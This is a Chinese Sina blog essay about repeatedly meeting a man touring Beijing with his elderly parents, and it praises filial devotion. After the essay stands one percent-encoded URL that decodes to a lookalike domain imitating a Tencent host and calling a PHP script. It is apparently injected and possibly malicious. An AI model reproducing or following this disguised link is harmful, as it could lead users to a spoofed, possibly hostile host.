加载中…
个人资料
临江仙
临江仙
  • 博客等级:
  • 博客积分:0
  • 博客访问:22,051
  • 关注人气:21
  • 获赠金笔:0支
  • 赠出金笔:0支
  • 荣誉徽章:
正文 字体大小:

路遇

(2010-03-28 13:17:29)
标签:

旅行

北京

亲情

父母之爱

出差

情感

分类: 散文

路遇

 

        大千世界,人海茫茫,每个人都只不过是匆匆过客。既使偶尔相遇,也往往失之交臂,过后便如烟似雾般地随风而散了。然而有时不经意的一面之缘,却能给人留下难忘的印象。我就遇到过这样一件事,至今记忆犹新。

        那年春天,我因公到大连出差。当赴京的列车到达包头时,天已经很黑了。这时我所在的卧铺车厢里上来了一对年迈的老夫妻和一个中年男子。看得出他是老俩口的儿子。正好我这个辅位的上辅空着,列车员就安排给了他们。中年男子让老俩口上去休息,两位老人互相谦让了一会儿,最后老妇人上去了。夜间行车时,无票的乘客都被请到硬座车厢里去了。中年男子想“特殊”一下,要求三人都留在卧铺车厢里,好互相有个照应,但列车员说车上的规定不允许,他只好搀扶着老父亲走了。次日一大早,两个人又匆匆过来,老妇人和老头子互相调换了一下位置。一路上,中年男子对两位老人照料备至,一直到了北京。

        因为行程比较宽松,我决定在北京玩两天再去大连。次日,我去游览故宫,没想到在天安门城楼上又碰见了他们仨人。老俩口都已上了年纪,走路有些不方便,尤其是老头子,走路时颤巍巍的,一直由儿子搀扶着。可能是觉得有缘吧,我们互相对视的笑了一笑,算是打了招呼,就各走东西了。当我一路从北海公园到颐和园、再到动物园时,居然又遇见了他们。这下我可是由衷地佩服起他们来了,就和那位中年男子聊了起来。原来他们来自阴山北麓的内蒙古大草原。以前生活过得艰苦,没有条件出远门,两位老人辛苦了一辈子,都七十多岁了,还没走出过草原一步。现在日子好过了,儿子决定带老俩口到北京看看外面的世界,一则尽尽孝心,二则了却两父母的心愿,这才和我有了这段缘分。让我感到惊奇的是,他们今天的旅游路线竟然和我的一模一样,而且也是乘座公交车往返。我都已经走得精疲力竭了,他们还是那么兴致勃勃。

        我想这位中年男子带着他七十多岁的老父母走这么远的路,经受数天的旅途颠跛和劳顿,没有一片赤子之心和坚强的毅力是决然完不成这一壮举的。那又是什么东西给予了他们坚强的毅力和信心的呢?看着他们相扶相携,相亲相爱的情景,我忽然明白了,那就是他们都有一颗忠孝仁爱之心。

        次日我就赴大连去了,从此再没有遇到过他们。但我想,不论今后遇到什么风风雨雨,他们都一定能走过去的,因为他们心中都充满着人间最纯最真最美的爱。

http://%69%6d%67%63%61%63%68%65%2e%71%71%2e%63%6f%6d%2e%71%71%64%69%79%2e%69%6e%66%6f/a/s/m.php

0

阅读 收藏 喜欢 打印举报/Report
前一篇:好人一生平安
后一篇:写给母亲
  

新浪BLOG意见反馈留言板 欢迎批评指正

新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 产品答疑

新浪公司 版权所有